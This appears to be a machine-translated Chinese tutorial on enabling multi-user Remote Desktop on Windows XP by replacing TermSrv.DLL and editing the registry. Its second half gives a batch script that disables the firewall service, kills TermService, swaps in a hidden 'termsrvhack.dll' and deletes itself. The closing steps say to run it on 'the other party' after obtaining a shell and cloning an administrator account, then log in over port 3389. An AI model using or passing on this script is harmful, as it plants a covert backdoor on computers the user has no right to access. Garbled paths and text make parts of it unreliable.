XP multi-user with a computer method

The first step: First, install the official SP2 version on Windows XP, install it in the usual way, no longer repeat here.

Step 2: Prepare an earlier version of the SP2 terminal server software (it is said that this function is forbidden since Build 2082, so it is best to use the previous version), the Chinese SP2 test version is more difficult to find, I used the English version of Build 2055 and found no problems after running. You can do this from http://www.msfn.org/board/index.php?s=85a71ca2987c89886c99733154ae685f&act" target="_blank">http://www.msfn.org/board/index.PHP?s= 8 ... c99733154ae685f&act

=Attach&type=post&id=161513Download the terminal server executable file TermSrv.DLL of Build 2055. Downloaded from this link is an extension of .DL_ File, you can change its extension to a ZIP file, and then use WinRAR to unlock it.

Step 3: Next, start Windows XP in safe mode, if there are multiple operating systems, you can start Another system that can access the Windows XP system partition (unless third-party tools are installed, Windows 98 cannot access the NTFS partition, so Windows 98 may be useless.) Then, back up all the TermSrv.DLLs of the SP2 official version of Windows XP. In the location where all TermSrv.DLL files appear, it is overwritten with the Build 2055 version of TermSrv.DLL. Usually, TermSrv.DLL appears in at least two locations: \\Windows\\system32, \\Windows\\system32\\dllcache. Where there is a TermSrv.DLL, use B The uild 2055 version of TermSrv.DLL is covered. This article was published at http://bianceng.cn (learning computer)

Step 4: Start Windows XP in normal mode, if the system's file protection function prompts TermSrv. The DLL file has been modified and asked if you want to restore it. Choose No.

Step 5: Finally, modify the registry to increase the multi-user license for the terminal server. It is cumbersome and error-prone to modify the registry. You can modify the registry with the following batch command:

@echo off

setlocal

set regkey="HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core"

reg add %regkey% /v EnableConcurrentSessions /T REG_DWord /D 1 /f

endlocal

Save the above as a batch command file, such as AA. BAT, double click to execute it.

I don't recommend this practice, it's too annoying to lock, and I have to let the system restart. We can write a batch file to enable XP multi-user login without restarting. First, let's first understand a command parameter for the registry operation:

REG ADD KeyName [/v ValueName /ve] [ ,null,null,3],/t Type] [/s Separator] [/d Data] [/f]

KeyName [\\\\Machine\\]FullKey

Machine Remote Machine Name - Ignore the default to the current machine. On the remote machine

only HKLM and HKU.

FullKey ROOTKEY\\SubKey

ROOTKEY [ HKLM HKCU HKCR HKU HKCC ]

SubKey The full name of the registry key under the selected ROOTKEY.

/v The name of the value to be added under the option.

/ve Add a blank value name (default) for the registry key.

/t RegKey Data Type

[ REG_SZ REG_MULTI_SZ REG_EXPAND_SZ

REG_DWord REG_BINARY REG_NONE ]

If omitted, REG_SZ is used.

/s Specifies a character to be used as a separator in the REG_MULTI_SZ data string

If omitted, "\\0" is used as a separator.

/d The data to be assigned to the added registry ValueName.

/f Forcibly overwrite existing registry entries without prompting.

Example:

REG ADD \\\\ABC\\HKLM\\Software\\MyCo

Add a registry key on the remote machine ABC HKLM\\Software\\MyCo

REG ADD HKLM\\Software\\MyCo /v Data /t REG_BINARY /d fe340ead

Add a value (Name: Data, Type: REG_BINARY, Data: fe340ead)

REG ADD HKLM\\ Software\\MyCo /v MRU /t REG_MULTI_SZ /d fax\\0mail

Add a value (name: MRU, type: REG_MUTLI_SZ, data: fax\\0mail\\0\\0)

REG ADD HKLM\\Software\\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%

Add a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)

Note: Using the caret ( ^ ) in the extension string
In order to keep the system from restarting, we can use the shutdown -a command.

According to the information found above, we can write a batch process to achieve multi-user login of XP system without restarting the system.

The code is as follows:

@echo off

@net stop sharedAccess

@ntsd -cq -p "pid"

@ Reg add HKLM\\SOFTWARE\\Microsoft\\Windows" "NT\\CurrentVersion\\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f

@reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWord /d 00000000 /f

@reg add HKLM\\SYSTEM\\CurrentControlSet\\control\\terminal" "server\\Licensing" "Core /v EnableConcurrentSessions /t REG_DWord /d 00000001 /f

@reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%\\system32\\termsrvhack.dll /f

@copy c:\\termsrvhack.dll c :\\Windows\\system32\\dllcache\\termsrvhack.dll

@attrib +h +s +rc:\\Windows\\system32\\dllcache\\termsrvhack.dll

@copy c:\\termsrvhack.dll c:\\Windows\\system32\\termsrvhack.dll

@attrib +h +s +rc:\\Windows\\system32\\termsrvhack.dll

@shutdown -a

@ Del c:\\termsrvhack.dll

@net start termservice

@del c:\\3389.bat

where "pid" is the PID number to be replaced with the TermService service, which can be obtained with the command tasklist/svc command. Of course, win2000 and the following systems do not have a tasklist command.

The specific operation method is: first get a SHELL from the other party, then use the third-party software to open the terminal service under the shell, don't change the default 3389 port first, otherwise you have to restart before you log in, build another one. Or clone a super administrator user.

Next, download the downloaded termsrvhack.dll and the above batch to the root directory of the other C drive, and then run the batch under the shell. Prompt success!

Finally open the lander, 3389 terminal login!